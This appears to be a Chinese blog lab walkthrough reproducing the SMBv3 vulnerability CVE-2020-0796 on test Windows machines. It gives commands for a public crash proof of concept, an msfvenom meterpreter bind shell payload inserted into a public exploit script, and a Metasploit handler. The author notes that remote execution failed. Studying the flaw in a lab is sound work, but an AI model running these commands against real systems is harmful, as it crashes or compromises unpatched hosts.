天天看點

永恒之黑(CVE-2020-0796 微軟SMBv3協定遠端代碼執行漏洞)

文章目錄

      • 一、漏洞簡介:
      • 二、影響版本:
      • 三、實驗環境:
      • 四、漏洞複現
        • 1.下載下傳CVE-2020-0796漏洞掃描工具,對網段進行掃描
        • 2.藍屏複現
        • 3.遠端執行複現

一、漏洞簡介:

3月12日,微軟更新安全通告針對Windows SMBv3用戶端/伺服器遠端代碼執行漏洞緊急釋出了安全更新檔,确定該漏洞編号為CVE-2020-0796。

Microsoft Server Message Block 3.1.1(SMBv3)協定在處理某些請求的方式中存在代碼執行漏洞。攻擊者可以精心構造資料包發送到SMB伺服器,無需經過身份驗證,即可在目标伺服器上執行任意代碼。攻擊者可通過部署一台惡意SMB v3伺服器,并誘導使用者(用戶端)連接配接到該伺服器,一旦目标使用者連接配接,即可在計算機上執行攻擊者自定義的惡意代碼。

由于上述漏洞易被蠕蟲利用傳播惡意程式,推測可能在未來會成為惡意軟體和攻擊者廣泛利用的漏洞,與WannaCry(2017年5月“永恒之藍”)漏洞較為相似。目前漏洞細節已公開,請相關使用者安裝更新檔進行防護。

二、影響版本:

該漏洞存在于 Windows 10 版本 1903 中添加的一項新功能中。Windows 的早期版本不支援 SMBv3.1.1 壓縮并且不受影響。

  • Windows 10 Version 1903 for 32-bit Systems
  • Windows 10 Version 1903 for ARM64-based Systems
  • Windows 10 Version 1903 for x64-based Systems
  • Windows 10 Version 1909 for 32-bit Systems
  • Windows 10 Version 1909 for ARM64-based Systems
  • Windows 10 Version 1909 for x64-based Systems
  • Windows Server, version 1903 (Server Core installation)
  • Windows Server, version 1909 (Server Core installation)

三、實驗環境:

靶機:192.168.159.129(Windows10 1903)

靶機:192.168.159.130(Windows10 1909)2020.1月更新的版本

攻擊機:192.168.159.131(kali 2021-05-31)

永恒之黑(CVE-2020-0796 微軟SMBv3協定遠端代碼執行漏洞)
永恒之黑(CVE-2020-0796 微軟SMBv3協定遠端代碼執行漏洞)
永恒之黑(CVE-2020-0796 微軟SMBv3協定遠端代碼執行漏洞)

四、漏洞複現

1.下載下傳CVE-2020-0796漏洞掃描工具,對網段進行掃描

下載下傳連結:http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
永恒之黑(CVE-2020-0796 微軟SMBv3協定遠端代碼執行漏洞)

2.藍屏複現

下載下傳藍屏POC
git clone https://github.com/eerykitty/CVE-2020-0796-PoC.git
安裝POC
python3 setup.py install
進行攻擊
python3 CVE-2020-0796.py 192.168.159.130
           
永恒之黑(CVE-2020-0796 微軟SMBv3協定遠端代碼執行漏洞)
永恒之黑(CVE-2020-0796 微軟SMBv3協定遠端代碼執行漏洞)
永恒之黑(CVE-2020-0796 微軟SMBv3協定遠端代碼執行漏洞)

3.遠端執行複現

下載下傳安裝exp
git clone https://github.com/root-tools/SMBGhost_RCE_PoC

生成payload
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=5555 -b '\x00' -f python > exploit
		-p 指定 payload LPORT 目标主機執行程式後打開的偵聽端口 
		-b 去掉壞字元,壞字元會影響 payload 正常執行。 
		> exploit 将生成的 payload 代碼儲存到檔案 exploit 中 
		\x00 代表16進制的“00”組成的字元串。通過ASCII碼換成能識别的就是:"00" - "00000000"- NUL。由于"00000000"是不可見字元,是以代碼中沒用。
           
永恒之黑(CVE-2020-0796 微軟SMBv3協定遠端代碼執行漏洞)
永恒之黑(CVE-2020-0796 微軟SMBv3協定遠端代碼執行漏洞)
把參數

buf

改為

USER_PAYLOAD

替換

exploit.py

裡的代碼
永恒之黑(CVE-2020-0796 微軟SMBv3協定遠端代碼執行漏洞)
永恒之黑(CVE-2020-0796 微軟SMBv3協定遠端代碼執行漏洞)
執行替換後的exp
python3 exploit.py -ip 192.168.159.130
           
永恒之黑(CVE-2020-0796 微軟SMBv3協定遠端代碼執行漏洞)
啟動msf監聽
msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set RHOST 192.168.159.130
msf6 exploit(multi/handler) > exploit 
           

不過,我在這裡沒做出來。。。無論怎麼搞都是隻能藍屏不能反彈shell,懵逼ing🤾‍♀

最終效果圖:

永恒之黑(CVE-2020-0796 微軟SMBv3協定遠端代碼執行漏洞)

繼續閱讀